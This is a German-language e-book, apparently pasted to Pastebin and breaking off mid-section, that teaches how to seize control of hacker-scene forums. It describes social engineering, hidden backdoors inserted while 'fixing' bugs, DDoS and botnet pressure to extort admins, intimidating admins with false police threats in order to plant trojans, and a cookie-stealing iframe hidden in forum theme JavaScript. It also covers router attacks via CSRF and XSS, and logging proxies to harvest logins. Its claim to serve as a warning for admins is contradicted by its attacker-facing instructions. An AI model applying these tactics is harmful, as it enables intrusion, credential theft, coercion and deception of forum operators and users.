Advertisement
Guest User

Untitled

a guest
May 9th, 2011
631
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 41.20 KB | None | 0 0
  1. #########################################################
  2. ###Taktiken zum uebernehmen von deutschen Scene-Boards###
  3. ####################e-book by unnex######################
  4. #########################################################
  5.  
  6. Inhalt:
  7.  
  8. Vorwort
  9.  
  10. 1. Grundwissen
  11. 1.1 Software
  12. 1.2 Teamanalyse
  13. 1.3 Usernamen & IP's
  14. 1.4 Vertrauen, Fame, Ressourcen & Kontakte
  15.  
  16. 2. Vorbereitung
  17. 2.1 IP's besorgen
  18. 2.2 bugs suchen
  19. 2.3 Faming
  20. 2.4 Board-interessen
  21. 2.5 Kontakte knuepfen
  22.  
  23. 3. Angriffs-Taktiken
  24. 3.1 der Helfer in der Not
  25. 3.1.1 Bug fixen
  26. 3.1.2 Botnet o. crashen
  27. 3.1.3 Maleware
  28. 3.1.4 modding
  29. 3.2 biete & suche
  30. 3.2.1 tolles Tool
  31. 3.2.2 Tutorial als htmldatei
  32. 3.2.3 mein Nolog, loggt
  33. 3.3 meine Projekte
  34. 3.3.1 meine Crew
  35.  
  36. ---
  37.  
  38. Vorwort:
  39. Dieses E-Book beschreibt Methoden zum Cracken von deutschen Hackerscene-Boards.
  40. Es beschreibt Methoden und Vorgehensweisen sowie wichtige Informationen
  41. die das Hacken eines Scene-Boards moeglich machen. Die hier beschreibenen
  42. Informationen und Angriffs-Taktitken sind von mir selbst
  43. des oefteren erfolgreich eingesetzt wurden. Dieses E-Book bezieht sich NUR
  44. auf Social-engeneering Angriffe.
  45. Wer dieses E-Book liest sollte sich darueber im klaren sein das es zur aufklaerung
  46. der Sicherheitsschwachstellen in deutschen Sceneboards dient. Und es dem zu folge
  47. eine Informationsquelle zur behebung dieser Schwachstellen darstellt.
  48. Es ist also kein Book of dead gegen die Scene. Es ist ein E-Book das den Admins
  49. lediglich Schwachstellen offenlegen soll damit sie diese dann beheben und beachten
  50. koennen. Alle hier beschrieben Angriffs-Taktiken beziehen sich auf Social engneering
  51. und sind somit sehr variierbar einsetzbar.
  52.  
  53. 1. Grundwissen
  54. In den nachsten Unterpunkten werden grundlegende
  55. Informationen ueber Scene-Boards und ihre Struktur
  56. sowie die Teammitglieder und deren eigenschaften
  57. beschrieben.
  58.  
  59. 1.1 Software
  60. Wie der Name schon sagt bestehen "Scene-Boards" aus
  61. Forensoftwares. Hierbei koennte man davon ausgehen
  62. das diese selber programmiert werden. Dem ist aber
  63. nicht so. Ich habe noch nie ein Scene-Board gesehen
  64. das selbst programmiert wurde, und werde wohl auch
  65. nie eins zu Gesicht bekommen. Folglich werden hier
  66. ausnahmslos, mehr oder weniger bekannte, schon existente
  67. Forensysteme, genutzt. zb im deutschen Sprachraum
  68. wird sehr oft auf: smf, vbulletin, wbb, phpbb und mybb
  69. zurrueck gegriffen. In China ist derzeit "discuz"
  70. der Renner usw...
  71. In diesem E-Book moechte ich mich aber auf die deutsche
  72. Scene beschraenken.
  73. Nicht nur die Forensysteme selber sondern auch die
  74. dazugehoerigen Mods und Addons werden nur in den
  75. aller seltensten faellen selbst oder teils selbst
  76. programmiert.
  77.  
  78. Demnach kann man also davon ausgehen das die Admins
  79. und Teammitglieder der Boards recht wenig ahnung
  80. vom Source ihrer Forensoftware haben.
  81.  
  82. Zu erklaeren ist dieser Zustand mit mangelnden
  83. programmiererichen Kenntnissen des deutschen
  84. Undergrounds.
  85.  
  86. Diese Tatsachen wirken jetzt auf den ersten Blick
  87. unwahrscheinlich. Sind aber das ganze Gegenteil
  88. und Bestandteil der moeglichkeiten zum hacken
  89. eines Scene-Boards. Aber dazu spaeter.
  90.  
  91. 1.2 Teamanalyse
  92. In den letzen Jahren hat der Anteil an Cardern
  93. in der Scene einen ueberdimensionalen Zuwachs bekommen.
  94. Was dazu gefuehrt hat das wirkliche Hacker & Programmierer
  95. meist nur noch die Leute sind die schon zum alten Eisen gehoeren.
  96.  
  97. Das fuehrt uns wiederum zu einer anderen Tatsache.
  98. Die scene besteht zum großteil aus Jugendlichen und halben Kindern.
  99. Somit ist es sehr unwahrscheinlich das ein Board von qualifizierten
  100. und erfahrenen Administratoren geleitet wird. Mitwrikend bei dieser
  101. Tatsache ist auch das viele von den alten Hasen frueher oder spaeter
  102. aus der Scene aussteigen oder einfach White-hat's werden.
  103. Was nicht zuletzt am erschreckend niedrigen Durchschnittsalter
  104. und den dazugehoerigen Verhaltensweisen der Scene'ler liegt.
  105.  
  106. Also, wenn man ein Scene-Board ownen will ist es wichtig vorerst
  107. das Team unter die Lupe zu nehmen. In den meisten Faellen
  108. wird man auf Juenglinge ohne programmiereriche Kenntnisse stoßen.
  109. Sollte dem nicht so sein dann ist es wichtig die einzelnen Personen
  110. und ihre Eigenschaften und Raenge im Team zu erkennen.
  111. Zb. Wer ist der Coder ? Wer der gfx'er ? Wer gehoert alles zu den
  112. normalen Mods. etc...
  113.  
  114. 1.3 Usernamen & IP's
  115. Im Underground ist es schon fast zum Volksport gewurden mehr als einen
  116. Username zu besitzen. Viele Scene-Mitglieder aendern also staendig oder
  117. speziell fuer verschiedene Projekte ihre Usernamen. Sollte man jetzt also
  118. den Username eines Admins kennen, so ist es wichtig diesen nicht als Dogma
  119. dessen Internet-Identitaet an zu sehen. Dinge wie icq-Nummern, E-Mailaddressen,
  120. Signaturen... koennen dabei helfen noch andere Usernamen der bertroffenen
  121. Personen herraus zu finden. Hierbei ist an zu merken das ein Scene'ler
  122. niemals oder so gut wie nie, nur auf einem Board angemeldet ist.
  123.  
  124. Ein weiterer Volkssport ist das dauerhafte anonyme Surfen. d.h. viele
  125. nutzen vpn's oder sock's dauerhaft oder zumindest immer wenn sie auf ihrem
  126. Board unterwegs sind. Was uns als Angreifer natuerlich nicht entgegen kommt.
  127. Deshalb ist es wichtig sich nie auf die IP-Adresse des Opfers zu verlassen.
  128. Selbst wenn diese als dynamiche IP ausgezeichnet ist. Denn auch hier ist es
  129. moeglich das der jenige einen Privatrechner infiziert hat und dessen Anbindung
  130. nun als socks nutzt. Man sollte also zum erspaehen der IP des Opfers immer
  131. Methoden nutzen bei denen man sich moeglichst sicher sein kann das man auch seine
  132. real IP bekommt.
  133.  
  134. 1.4 Vertrauen, Fame, Ressourcen & Kontakte
  135. Wie schon erwaehnt ist der Großteil der Scene nicht sehr bewandert was das
  136. Hacken, insbesondere alte und weniger uebliche Hackingmethoden betrifft.
  137. In vielen Faellen ist es also recht einfach diese Leute zu beeindrucken oder
  138. sie von deinem Koennen zu ueberzeugen. Zb. Weist du was eine session fixation ist
  139. oder ein tpl-inject oder eine array function escalation ? Ob du es nun weist oder nicht,
  140. ich kann dir versichern in der Scene wissen es nur die wenigsten bis ueberhaupt niemand.
  141. Solches wissen ist sehr wichtig fuer dich. Damit kannst du zeigen wieviel du weist
  142. und das du mehr weist als Andere. Und dieses wissen kannst du zum festigen deiner Rolle
  143. als richtiger Hacker bestens verwenden.
  144.  
  145. ----------------------------
  146. (groß und kleinschreibung mach ich ma spaeter... XD bin jetzt zu faul das weiter zu korrigieren XD)
  147. ----------------------------
  148.  
  149. der fame an sich ist natuerlich auch eine gute grundlage fuer einen erfolgreichen angriff.
  150. seltsamerweise wird fame oft mit vertrauen gedankt. dein fame in der scene kann also
  151. zu einem maechtigem trumpf bei angriffen auf scene-boards werden. allerdings fuehrt fame
  152. auch zu vielen neidern die sich nicht selten zu richtigen hatern entwickeln.
  153. im grunde ist das auch kein wunder wenn man das alter dieser "hater" und der scene
  154. allgemein betrachtet. sollte man jetzt also versuchen den admin eines boards mittels
  155. fame ein zu wickeln dann ist es einfach nur notwendig darauf zu achten das dieser admin
  156. kein hater des fames ist den du einsetzt.
  157.  
  158. eine weitere nuetzliche sache ist das vorhandensein der richtigen kontakte und ressourcen.
  159. mit kontakten und ressourcen meine ich kontakt zu den boardadmins und der scene selber
  160. sowie den besitz einiger server zum hosten oder socks zum usen. ebenso etwas wissen
  161. im crashen von servern oder evtl. ein kleines botnet dein eigen nennen.
  162.  
  163. 2. vorbereitung
  164. an diesem punkt werde ich jediglich beschreiben wie man sich einige nuetzliche informationen
  165. beschafft die fuer die verschiedenen angriffstaktiken hilfreich oder sogar notwendig sind.
  166.  
  167. 2.1 ip's besorgen
  168. wie schon gesagt nutzt die scene forensysteme die sie einfach ziehen und hochladen und nach
  169. belieben aufmodden. jeder der ein bisschen erfahrung in sachen hacking hat kann sich
  170. jetzt ausmahlen wie einfach ein spionage angriff auf die ip eines users waere. diese
  171. forensysteme erlauben es grafiken von entferneten server ein zu binden. nutzt man jetzt also
  172. das prinzip des webbugs (zaehlpixel problematik) dann ist es ein kinderspiel die ip
  173. des gegenueber zu ermitteln. wir laden eine grafik auf einen unserer server hoch und haengen
  174. sie uns im forum als signatur an. oder schicken sie im bbcode bei einer privaten nachricht mit.
  175. anschließend sehen wir dann bei uns in die serverlogs und suchen uns raus welche ip wann
  176. unsere grafik aufgerufen hat. diese methode klappt auch bei vielen messanger darunter auch icq 7.
  177. alternativ zu dieser methode kann man das opfer auch dazu bringen es auf einen link klicken
  178. zu lassen um dann dort die ip per serverlogs oder zb php zu loggen.
  179.  
  180. eine weitere moeglichkeit waere zb. ihm einen sock an zu bieten. wenn er dann versucht den sock
  181. zu usen koennen wir alles fein saeuberlich mitloggen incl. ip.
  182.  
  183. diese methoden sind natuerlich
  184. nicht die einzigen. wie sich jeder denken kann gibt es zig methoden um an die ip oder die
  185. proxy ip des opfers zu gelangen.
  186.  
  187. nun ist es aber so das viele sceneuser dauerhaft hinter einem proxy oder aehnlichen sitzen.
  188. hierbei empfehlen sich methoden bei denen man sich moeglichst sicher sein kann die richtige
  189. ip zu bekommen. eine moeglichekeit waere zb. ein angriff auf den router des opfers. natuerlich
  190. kann man die meisten router nicht direkt uebers internet angreifen. und ueber wlan auch nicht
  191. da man nicht weis wo er ist. ebenso kann das wlan des routers sehr gut verschluesselt. ein angriff
  192. uebers internet auf den router des opfers wirkt also geradezu absurt. doch gerade deswegen
  193. ist diese angriffsart fuer uns interessant. niemand wuerde erwarten das ein angreifer aus dem
  194. internet heraus und ohne den opferrechner zu infizieren und ohne das der router aus dem internet
  195. erreichbar ist, im stande ist den router an zu greifen. diese tatsache fuehrt dazu das alle
  196. angriffe die von außen kommen mittlerweile recht gut zu verhindern sind. allerdings wird dabei
  197. das internet vernachlaessigt. viele user fuehlen sich mit ihren macfiltern und wpa2 schluesseln
  198. so sicher das sie nicht daran denken ein ordentliches router passwort zu setzen. die meisten router
  199. haben also die standartlogin daten drinn und als authentifikation ausgewaehlt. wir koennen uns also
  200. per csrf in den router einloggen bzw. unser opfer macht das fuer uns unbewusst. dabei ist es
  201. natuerlich wichtig moeglichst viele routerarten in unser script ein zu binden. also, loggt das opfer
  202. sich jetzt per csrf in den router so koennten wir ueber einen xss bug im router alle infos
  203. die der router hat beschaffen. so unglaublich wie es klingt. aber sehr, sehr viele router-firmwares
  204. haben xss bugs, manche von denen sind sogar nutzbar egal ob jemand eingeloggt ist oder nicht.
  205. ebenso kommt es auch oft vor das man im eingeloggten zustand den router per csrf oder bloßen link
  206. resetten kann u.ae.
  207.  
  208. 2.2 bugs suchen
  209. nein hiermit meine ich keine sqli's oder rfi, tpli usw... wenn wir sowas finden wuerden braeuchten
  210. wir uns keine muehe mehr zu machen diesen text hier weiter zu lesen^^ ich meine bugs bei denen man
  211. sein opfer mehr oder weniger mit einbeziehen muss. also zb. xss, csrf, session fixation, clickjacking...
  212. allerdings beschreibe ich hier den einsatz dieser bugs nicht im herkoemmlichen sinne. wir nutzen
  213. die bugs also nicht aus (in dem sinne wieso sie ueberhaupt bugs sind). sondern wir nutzen sie als
  214. mittel um unsere scheinbare hilfsbereitschaft an zu bieten. aber dazu mehr bei der beschreibung der
  215. einzelnen angriffstaktiken.
  216.  
  217. das finden solcher bugs ist bei den forensystemen oftmals sehr einfach. es existieren sogar
  218. sehr oft schon bug reports von aktuellen forensystemen die solche bugs behandeln. zb ist mitte
  219. 2010 eine xss luecke beim eintragen einer homepage im profil gleich auf mehreren forensystem
  220. vertreten gewesen. darunter vbulletin, smf, phpbb. bei wbb3.0.x gab es ebenfalls eine xss luecke
  221. im userprofil. derzeit muesste wbb3.1.3 die neuste version sein. auch diese enthaelt eine session
  222. fixation die man mit csrf koppeln kann. fuer zb clickjacking sind derzeit so gut wie alle
  223. forensysteme anfaellig. man merkt also das finden solcher bugs ist sehr wahrscheinlich
  224. und diese wahrscheinlichkeit erhoeht sich nicht selten kontinuierlich mit der anzahl an mods
  225. die das board inne hat.
  226.  
  227. 2.3 faming
  228. wie bereits erwaehnt kann fame von großem nutzen sein um das vertrauen des boardadmins zu gewinnen.
  229. haben wir ein paar news in bekannten it-zeitschriften oder blogs oder aenhlichen dingen dann wird
  230. uns des oefteren sehr schnell respekt und vertrauen entgegen gebracht. besonders in verbindung mit
  231. punkt 2.2 ist dieses spezielle vertrauen hilfreich. denn hier bekommen wir einerseits vertrauen
  232. und andererseits techniches wissen zugeschrieben. wenn wir jetzt also einem admin einen bug
  233. reporten dann haben wir sehr hohe chancen beim fixen des bugs selber mitwirken zu koennen.
  234. und dieses selbst mitwirken kann der schluessel zum serverzugriff sein. ebenso vereinfacht
  235. es das unterjubeln von schadsoftware oder schaedlichen links. mit dem vorwand eine besonders gute
  236. exploitseite oder ein besonders gutes hackertool geben zu wollen, haetten wir hier recht gute chancen.
  237.  
  238. diesen fame kann man natuerlich auch ueber "beeindruckende" taten auf dem board erwirken.
  239. zb wir schreiben ein paar sehr brauchbare tuts und stellen sie ins board oder verschenken
  240. einige brauchbare accounts usw...
  241.  
  242. ebenso koennten wir uns auch ein paar kontaktpersonen (die zum admin fuehren) zu nutzen machen
  243. um dem admin ammenmaerchen von unseren "superskills" zu unterbreiten.
  244.  
  245. 2.4 board-interessen
  246. gezielt die interessen des boards aus zu nutzen ist ebenfalls eine brauchbare taktik.
  247. vorerst sollte man feststellen was dem board fehlt. bzw was die user brauchen. zb
  248. man laed einen trojaner hoch getarnt als exploitsoftware in der hoffnung der
  249. admin zieht ihn sich und infiziert sich damit. oder man merkt das der admin oder
  250. teammitglieder socks brauchen. wenn sie diese brauchen fallen gleich zwei aspekte ins spektrum.
  251.  
  252. erstens: man weis nun das sie nicht anonyme im board unterwegs sind und hat leichtes spiel
  253. bei punkt 2.1
  254.  
  255. zweitens: man gibt ihnen einen socks den man selber verwaltet und loggt ihre userhandlungen mit.
  256. dabei auch die des einloggens in den adminpanel des forums. in der scene weis sowieso keiner wie
  257. unsicher die socks5 verschluesselung wirklich ist!
  258.  
  259. oder man erfaehrt dass das board ein neues design brauch. man macht eins+spielereien mit javascript
  260. und hinterlaesst in diesen ein paar xss bugs. die uns bei 2.2 natuerlich einen freibrief schenken
  261. wuerden.
  262.  
  263. oder der admin muss umhosten weil er den server nicht mehr bezahlen kann. wenn ihr ihn dazu bringt,
  264. ihn bei euch hosten zu lassen... ;-)
  265.  
  266. es gibt also viele interressen die vielseitig ausgenutzt werden koennen.
  267.  
  268. 2.5 kontakte knuepfen
  269. das beschaffen der richtigen kontakte kann von großem nutzen sein um zb. seine autoritaet oder
  270. glaubwuerdigkeit zu festigen. hierbei ist es wichtig, ueber welchen weg auch immer, einen
  271. kontakt zum admin zu bekommen. wuerden wir zb. kontakt zu einem teammitglied bekommen dann koennten
  272. wir dieses nutzen um uns bei dem admin einen namen zu machen.
  273.  
  274. 3. angriffs-taktiken
  275. alle bis jetzt genannten dinge sind wichtig fuer diesen punkt und dienen als fundament fuer
  276. die nachfolgenden angriffs-taktitken.
  277.  
  278. 3.1 der helfer in der not
  279. hierbei erzwingt man bewusst situationen bei denen man den admin seine hilfe anbieten kann
  280. oder vom admin darum gebeten wird.
  281.  
  282. 3.1.1 bug fixen
  283. bei dieser methode ist es wichtig den richtigen fame und die richtigen bugs mit ein zu bringen.
  284. als erstes suchen wir uns den fame. hierzu nehmen wir uns einen hacker der in einigen
  285. scene news erwaehnt wurde. diese identitaet nehmen wir nun an. dabei sollten wir moeglichst
  286. darauf achten das der admin des boards keinen kontakt zu dieser fame-person hat und das diese person
  287. keine kontaktmoeglichkeiten oeffentlich im netz bereit stellt. also moeglichst jemand nehmen
  288. der nur mit username in den news zu finden ist. nun stellen wir uns auf dem board mit unserer
  289. identitaet vor und bringen in unseren vorstellungsthread unsere newseintraege ein und haengen
  290. uns noch ein paar bemerkenswerte programmiereriche faehigkeiten an. dann warten wir erstmal
  291. ein bisschen ab und sehen wie die member auf unsere vorstellung reagieren. rund einen tag warten
  292. und reinschauen. in den meisten faellen werden wir herzlichst begruest und werden sogleich mit
  293. anfaenger fragen uebers hacken und tutanfragen bombadiert. diesen anfragen gehen wir so schnell
  294. wie moeglich nach um unseren status als richtig guter hacker zu festigen. ist das getahen dann suchen
  295. wir einen bug auf dem forum. also wie schon beschrieben in "2.2 bugs suchen". diesen bug reporten
  296. wir dem admin oder coder des boards. beim reporten ist es sehr wichtig viel fachchinesich mit ein zu
  297. bringen und den bug moeglichst kompliziert darzustellen und ihm weitreichende auswirkungen zu zu
  298. schreiben. ebenfalls ist es wichtig den bug so dar zu stellen das es aussieht wie als koennte man
  299. ihn nur schwer fixen. anschließend warten wir die reaktion des gegenueber ab und sehen ob er weis
  300. was zu tuhen ist oder nicht. wenn er es nicht weis bieten wir ihm prompt unsere hilfe an.
  301. wenn er weis was zu tuhen ist. muessen wir schnellstmoeglich gegenargument fuer seine ideen einbringen.
  302. also zb wenn wir ihm einen xss bug reporten und er mein er wird einfach " oder > ausdeclarieren
  303. dann antworten wir ihm das dies nicht ausreichend ist da man zb mit etwas glueck diese zeichen
  304. mit unbekannten zeichen die man davor stellt erzwingen kann. oder das die function die man zum
  305. ausdeclarieren nutzt ja wieder eine array function escalation moeglich machen koennten usw.
  306. haben wir es geschafft dem admin weis zu machen dass das fixen des bugs nicht so einfach ist
  307. wie er denkt dann ist es an der zeit eure hilfe an zu bieten. am besten ihr sagt noch das ihr das
  308. schon ein paar mal gemacht habt und wisst worauf ihr achten muesst. und das bestimmt recht schnell
  309. gehen wird den bug zu fixen. nun stellt sich die frage: in wie weit koennt ihr mitwirken beim fixen
  310. des bugs ? an dieser stelle moechte ich ein paar moegliche varianten beschreiben.
  311.  
  312. -er gewaehrt euch server zugriff damit ihr den bug fixen koennt.
  313. jetzt ist natuerlich klar was ihr macht. ihr fixed den bug und baut zugleich ein kleines backdoor
  314. in den source ein. achtet darauf das das backdoor moeglichst tief im source versteckt ist
  315. und aus zb. rund 2-3 zeile besteht und variablen namen moeglichst angepasst an andere variablen
  316. im source sind.
  317.  
  318. -ihr bekommt die betroffene sourcedatei geschickt und sollt sie ihm gefixed geben
  319. damit er sie selber hochladen kann.
  320. wieder fixt ihr den bug baut ein backdoor ein.
  321.  
  322. -er gibt euch remote zugriff auf seinen rechner und will zusehen wie ihr den code fixt.
  323. das kann ein gewagtes manoever werden aber es ist durchaus machbar. ihr nehmt euch einen
  324. code zum fixen der moeglichst lang ist. am besten so lang das niemand lust haette
  325. diesen nochmal zu untersuchen. diesen kopiert ihr im dann in seine phpdatei. in euren
  326. fix code habt ihr natuerlich wiederum ein kleines backdoor eingebaut. es kann auch nicht
  327. schaden den code ueber die ganze datei auf zu teilen und das fixen bei dem der admin zusieht
  328. sehr schnell von statten gehen zu lassen. so das der admin schon beim sehen sichtlich
  329. uebefordert wird.
  330.  
  331. sollte der seltene fall auftreten und euer opfer fixed den bug selber dann ist es wichtig
  332. einen neuen zu finden. bzw die von euch genannten gegenargumente auf seinen fix wirken zu lassen.
  333. in den meisten faellen klappt das auch und ihr koennt ihm beweisen das er den bug nicht selber
  334. fixen kann. in diesem fall habt ich dann hoechstwahrscheinlich eine der drei so eben genannten
  335. varianten zur auswahl. habt ihr es dann geschafft dem source euren abckdoor unter zu jubeln,
  336. dann muesst ihr nur noch warten bis keiner mehr vom team auf dem board online ist. also moeglich
  337. mitten in der nacht. dann koennt ihr in aller ruhe euer backdoor nutzen und den server uebernehmen.
  338.  
  339. 3.1.2 botnet o. crashen
  340. bei dieser methode sind wir vor allem auf unsere ressourcen angewiesen. es geht zwar auch ohne, und wie
  341. es ohne geht, beschreibe ich auch. aber man wird merken, die methode ohne ressourcen ist wahrscheinlich
  342. weniger erfolgreich. vorerst wie es ohne ressourcen geht:
  343.  
  344. wir melden uns wieder auf dem betroffenen forum an und stellen uns vor. dabei merken wir an
  345. das wir ueber ein sehr gutes wissen und sehr viel erfahrung im absichern von servern gegen ddos
  346. und aehnliche angriffe haben. wenn uns die ersten member "hallo" gesagt haben und wir halbwegs zur
  347. kenntniss genommen wurden, kanns auch schon los gehen. wir suchen uns einen bug in der serversoftware
  348. und bringen den server zum absturz. also einen dos bug oder memory corruption usw...
  349. gelingt uns das, also das wir einen bug finden, dann legen wir das board vortan jedesmal lahm wenn
  350. teammember oder der admin selber online ist. es wird nur wenige tage oder vllt. auch nur stunden dauern
  351. bis den boardbetreibern dieser zustand gehoerig auf die nerven geht. folglich werden sie versuchen
  352. etwas gegen das problem vor zu gehen. jetzt gibt es mehrere moeglichkeit. behebt das team tatsaechlich
  353. diese bugs dann ist schicht im schacht fuer diese methode. sollten sie es nicht beheben koennen
  354. dann sind sie logischerweise auf hilfe angewiesen. wenn du glueck hast kommen die admins
  355. aufgrund deines vorstellungsthreads selbst auf dich. sollte dem nicht so sein, dann ist jetzt schnelles
  356. handeln gefragt. wir kontaktieren den admin und teilen ihm unser bedauern ueber den zustand des boards
  357. mit und schlagen ihm vor den server zu sichern. unseren vorstellungsthread erwaehnen wir dabei auch
  358. um ein bisschen glaubwuerdigkeit mit ins spiel zu bringen. der admin wird uns vorerst kein vertrauen
  359. schenken. also crashen wir weiter seinen server. diesesmal aber nonstop sobald wir die antwort vom
  360. admin erhalten haben in der zum ausdruck kommt das er unsere hilfe nicht annimmt. wenn wir der meinung
  361. sind das wir ihm genug auf den zeiger gegangen sind dann schreiben wir ihn wieder an und bieten ihm
  362. eine sofortloesung an. also wir bieten ihm ein server script an das ein backdoor enthaelt.
  363. um den admin weiter ein zu wickeln merken wir an das wir doch so gerne auf diesem board unterwegs
  364. sind und alles moegliche machen moechten um es wieder online zu bekommen. des weiteren bitten wir
  365. ihn darum es doch wenigstens mal fuer kurze zeit zu probieren. und wenn es nicht klappt kann er es
  366. ja wieder runter hauen. mit etwas glueck nimmt er diesesmal unser angebot an. nun muessen wir nur noch
  367. eine kurze zeit warten zb. eine stunde, und dann stoppen wir unseren angriff auf das board.
  368. was nun passiert ist klar. wir schreiben den admin an und belatschern ihn permanent, wie toll
  369. es doch ist dass das script funktioniert. diese aktion soll uns zeit verschaffen bzw den admin
  370. mit uns beschaeftigen damit wir zeitgleich unseren backdoor ausnutzen koennen bevor der admin das
  371. script evtl. wieder loescht. sollte der admin diesen vorschlag nicht annehmen und unser script
  372. nicht nutzen wollen dann geben wir ihm einen tip der an die servereinstellungen gebunden ist.
  373. also zb logs ausschlaten, mit der aberwitzigen begruendung das man den prozess des loggens damit
  374. unterbindet und somit das script weniger zu tuhen hat und weniger schnell ueberastet werden kann usw...
  375. frueher oder spaeter wird er so etwas ausprobieren, was wir ihm vorschlagen. wenn das geschieht
  376. dann stoppen wir unsere crash angriffe und vernehmen die danksagung des admins, das unser tip
  377. geholfen hat. nun warten wir eine ganze weile zb. eine woche. dann greifen wir wieder an.
  378. und wieder bieten wir unsere hilfe an. diesesmal aber mit der begruendung das bei diesem angriff
  379. mehr gemacht werden muss. wir haben dem admin schon einmal geholfen. diesesmal wird er unser
  380. serverscript wohl eher annehmen. und wenn er das macht dann haben wir es, wie schon gesagt, geschafft
  381. und koennen den server uebernehmen.
  382.  
  383. nun zur vorgehensweise mit ressourcen.
  384. natuerlich kann es vorkommen das man den betroffenen server nicht so einfach crashn oder dosen kann.
  385. in diesem fall muessen wir mit unverhinderbaren mitteln rann. also zb. ein richtig großes botnet.
  386. wir legen das board erstmal fuer ein paar tage oder stunden lahm. dann schreiben wir den admin
  387. an und fragen ob er nicht einen besseren server haben will. einen den wir sponsern wuerden.
  388. im grunde ist es meist nur eine frage der zeit. also wir ddosn so lange bis der admin auf unser
  389. angebot eingeht. sollte er auf einen anderen server wechseln der nicht zu uns gehoert, dann ddosn
  390. wir auch diesen server. also, wenn es soweit ist und er unseren vorschlag annimmt dann muessen
  391. wir nichts weiter machen als zu warten bis er treudoof seine backups und daten auf unseren
  392. server hochlaed, wo wir sie dann in aller ruhe einsehen koennen. wichtig bei dieser methode
  393. ist natuerlich das wir bei unserer vorstellung im forum betonen das wir im besitz verdammt guter
  394. server sind.
  395.  
  396. 3.1.3 maleware
  397. diese methode erfordert besonders viel geschick weil es hier von noeten ist mehrere rollen zu spielen
  398. die sehr gut aufeinander abgestimmt sein muessen. des weiteren ist diese methode recht langwierig.
  399. zu erst legen wir uns ein paar accounts auf seinem board an.
  400. dann besorgen wir uns die ip des admins. danach forschen wir ein bisschen nach. wir brauchen
  401. ein paar usernamen oder andere internet-addressen auf denen der admin angemeldet ist.
  402. wenn wir moeglichst viel informationen ueber diese person haben dann schreiben wir ihn an. das machen
  403. wir aufbrausend und leicht gereizt. also wir schreiben ihn in etwa so an:
  404. du: na, xxx AKA xxxx und AKA xxxxx. ich hab deine ip 000.00.00.0! und die werden die bullen bekommen ;-)
  405. (wichtig dabei ist das wir auch wirklich seine real ip haben.)
  406. der admin wird versuchen sich nichts anmerken zu lassen, und macht einen auf dicke hose und
  407. das es ihn angeblich nicht interessiert. an dieser stelle verdeutlichen wir ihm das er angeblich
  408. einen trojaner von uns auf seinem system hat. das machen wir indem wir seine ip ddosn.
  409. wir warten nun bis er wieder online ist. wenn er wieder da ist erzaehlen wir ihm folgendes:
  410. du: na soll ich nochma machen ? scan mal dein sys du noob. aber egal, in rund 8 tagen kommen die cops ;-)
  411. nachdem wir das gesagt haben verschwinden wir einfach ohne weitere worte.
  412. jetzt lassen wir dem admin ein paar tage zeit. nach 1-2 tagen schreiben wir ihn von unseren board
  413. accounts an. und erzaehlen ihm das wir gehackt wurden. jeder account sollte dabei einzeln
  414. richtig am rummheulen sein das er von den bullen hochgenommen wurde. dabei muss mindestens ein account
  415. genutzt werden um dem admin eine info zu entreißen die wir schon wissen. wir muessen ihn dazu bringen
  416. das er uns sagt das er von dem angreifer angeschrieben wurde.
  417. nun sollte dem admin langsam bange werden und er kommt ins gruebeln. wir warten wieder einen tag.
  418. dann nehmen wir uns einen unserer foren accounts und schreiben ins forum das alle aufpassen
  419. sollen und nachsehen sollen ob sie infected sind. mit den anderen accs schreiben wir rein
  420. das wir infected sind. wir warten wieder einen tag. dann schreiben wir den admin an und erzaehlen
  421. ihm das wir den trojaner auf unserem system gefunden haben und eine software haben mit der man ihn
  422. aufspuehren kann. wenn wir bis jetzt gut gearbeitet haben und dem admin genug angst gemacht haben
  423. wird er unsere maleware annehmen und wir haben ihn trojanert.
  424.  
  425. 3.1.4 modding
  426. hier ist es wichtig die richtigen interessen des boards zu erfahren. ich auf nur eine
  427. moeglichekit eingehen. also, sollte das board ein neues design brauchen:
  428. wir melden uns auf dem board an und prahlen mit unseren tollen designer skills. mit in den
  429. vorstellungsthread bringen wir ein paar 0815 designs ein. die allerdings fuer ein anderes
  430. forensystem sind. dann schreiben wir den admin an und schlagen ihm vor ein design, ein richtig
  431. gutes design fuer sein board zu machen. er wird diesen vorschlag nicht ablehnen. weil ein design
  432. ja eigentlich nicht schaden kann und er schlussendlich immernoch nein sagen kann. nebenbei
  433. machen wir uns weitere foren accounts und erzaehlen von diesen aus, das uns das alte design nicht
  434. gefaellt. nun ist es an der zeit unsere rolle als helfer einen sinn zu geben. wir fragen den admin
  435. ob es moeglich waere das wir nachdem neuen design zum gfxer oder aehnlichen ernannt werden.
  436. der admin wird dieses ganze geschehen wahrscheinlich nur als probesache aufnehmen. wir basteln
  437. jetzt also das design. und erklaeren das wir uns sehr viel muehe gegeben haben und sogar javascript
  438. fenster und handlungen fuer tolle effekte mit reingebracht haben. (dem sollte auch wirklich so sein!)
  439. und jetzt kommt der ausschlag gebende punkt. der admin wird nicht darauf achten das javascript
  440. gefaehrlicher sein kann als man denkt. wir geben ihm also screens aus dem localmode wo wir
  441. das design am laufen haben und ueberreden ihn es auf seinem board zu nutzen. was der admin
  442. dabei uebersieht, ist die gefahr die von unserem javascript code ausgeht. denn in diesen
  443. code basteln wir einen cookielogger ein. am besten versteckt als iframe. also, location.href+cookie
  444. und das in nen iframe und verstecken. das sollte reichen. wenn der admin jetzt dieses design
  445. aufs forum knallt werden die cookies der user permanent auf einen unserer server eubertragen.
  446. so unglaublich wie es klingt. aber nur die wenigstens bis ueberhaupt niemand sieht sich 100kb js
  447. dateien die einzeilig sind an, und findet xss backdoors. diese methode ist also unter umstaenden
  448. eine sehr efektive wahl.
  449.  
  450. 3.2 biete & suche
  451. diese methoden beziehen sich auf das oeffentliche einbringen von tools und aehnlichen dingen ins board.
  452. also, wir bieten im forum kostenlos tools und tuts an.
  453.  
  454. 3.2.1 tolles tool
  455. zu dieser methode brauch ich wohl nicht viel zu sagen. weil sie ohnehin abgedrochen und nur noch selten
  456. mit erfolg gekroent ist. wir brauchen ein paar foren accounts und fud
  457. maleware. diese maleware bieten wir im forum kostenlos an und erklaeren mit den anderen accounts
  458. wie toll dieses programm doch funzt und wie hilfreich es ist. wenn wir glueck haben dann
  459. wird auch der admin versuchen unsere maleware zu nutzen. und somit haetten wir ihn als victim in unserer
  460. trojanerliste.
  461.  
  462. 3.2.2 tutorial als htmldatei
  463. bei deiser methode nutzen wir wieder die unwissenheit des admins aus. zu erst erstellen wir einen
  464. forenaccount und posten ein paar normalen .txt tutorials. wenn wir genug davon gepostet haben und
